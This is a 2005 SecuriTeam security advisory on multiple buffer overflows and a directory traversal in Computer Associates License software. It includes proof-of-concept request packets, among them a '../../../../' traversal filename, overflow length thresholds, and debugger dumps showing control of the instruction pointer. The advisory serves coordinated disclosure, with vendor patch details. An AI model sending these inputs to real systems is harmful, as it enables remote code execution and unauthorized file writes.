[NEWS] Multiply Vulnerabilities With Computer Associates License (Multiply Buffer Overflows, Directory Traversal)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/07/05

Next message: SecuriTeam: "[NT] Buffer Overflow In Golden FTP ( Long Username)"

Previous message: SecuriTeam: "[NT] Directory Traversal In CProxy"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 7 Mar 2005 10:34:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Multiply Vulnerabilities With Computer Associates License (Multiply Buffer
Overflows, Directory Traversal)
------------------------------------------------------------------------

SUMMARY

The <http://www3.ca.com/> Computer Associates License Client/Server
applications provide a method for CA products to register their licenses
on the network.

The CA Licence client/server contains multiply vulnerabilities.

DETAILS

Vulnerable Systems:
* CA License software v1.53 through v1.61.8.

Immune Systems:
* CA License software v1.61.9 or higher.

PUTOLF Name Buffer Overflow:
Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System (on Windows platforms) or root (on Linux
platforms).
The vulnerability specifically exists in the handling of the filename used
in PUTOLF requests.
Using a name over 252 bytes long, it is possible to overwrite the saved
instruction pointer, allowing execution of arbitrary code.

Proof Of Concept:
A0 PUTOLF 1 H A 10 name 2700 File Contents<EOM>

Invalid Command Buffer Overflow:
The vulnerability specifically exists because of insufficient bounds
checking on user-supplied values in requests with an invalid format.
When a packet containing an overly long string which is not a valid
command is received, the server uses that string to generate a log message
without checking if the buffer that the message is being stored in is
large enough. By sending a string over 2100 bytes long, it is
possible to overwrite the saved instruction pointer, allowing execution of
arbitrary code.

PUTOLF Directory Traversal:
Remote exploitation of a directory traversal vulnerability in Computer
Associates International Inc. License Client can allow attackers create
files in arbitrary locations.

The vulnerability specifically exists in the handling of the filename used
in PUTOLF requests. A PUTOLF request looks something like this:

Proof Of Concept:
A0 PUTOLF 1 H A 10 ../../../../ 2700 Test Data Goes Here<EOM>

GETCONFIG Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GETCONFIG requests. Under normal operation, the
License Server will send a GETCONFIG request to connecting clients and
clients may optionally respond with a similar GETCONFIG packet. Both the
client and server software fail to check bounds on the last parameter of
the GETCONFIG packet which results in a stack overflow as shown below.

Ollydbg output after SEH overwrite in CA License Server:
EAX 00000001
ECX 7C90FB71 ntdll.7C90FB71
EDX 0000000D
EBX 00E4E053 ASCII "GETCONFIG"
ESP 00E2FC9C
EBP 00E4E050 ASCII "A0"
ESI 00E2FD18
EDI 00E4E05D ASCII "SELF"
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System. The GETCONFIG packet also contains the remote
operating system's version information, which increases the likelihood of
successful exploitation.

GCR Network Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GCR requests.

Proof Of Concept:
A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the IP address, hostname, or netmask contain large values, the stack
overflow can be triggered.

Ollydbg output after SEH overwrite in CA License Server:
EAX 00630210
ECX 7C91056D ntdll.7C91056D
EDX 003B0608
EBX 00E4E053 ASCII "GCR"
ESP 00E2FC7C ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00E4E050 ASCII "A0"
ESI 00E2FD28 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00E4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE

SEH chain of thread 00000DA4, item 0
Address=00E2FFA4
SE handler=58585858

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System. A GETCONFIG packet exchange which discloses
the remote operating system version usually proceeds the GCR request and
increases the likelihood of successful exploitation.

GCR Checksum Buffer Overflow:
The vulnerability specifically exists due to insufficient bounds checking
on user-supplied values in GCR requests.

The GCR request packet format:
A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the second, fifth, eighth, or eleventh field of the Checksums item
contains a large string, a stack overflow will occur.

The format specifier for the call to sscanf() is simply:
"%x %s %i %x %s %i %x %s %i %x %s %i"

If the eleventh field is used to overflow the local stack buffer, the
return address will be overwritten with the address at 64 bytes into the
overflow string.

Ollydbg output after SEH overwrite in CA License Client:
EAX 00630510
ECX 7C91056D ntdll.7C91056D
EDX 003B0000
EBX 00D4E053 ASCII "GCR"
ESP 0082FC10 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00D4E050 ASCII "A0"
ESI 0082FCBC ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00D4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

Vendor Status:
The vendor has released a patch:
<http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp>
http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Disclosure Timeline:
02/08/2005 Initial vendor notification
02/09/2005 Initial vendor response
03/02/2005 Coordinated public disclosure

ADDITIONAL INFORMATION

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] Buffer Overflow In Golden FTP ( Long Username)"

Previous message: SecuriTeam: "[NT] Directory Traversal In CProxy"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]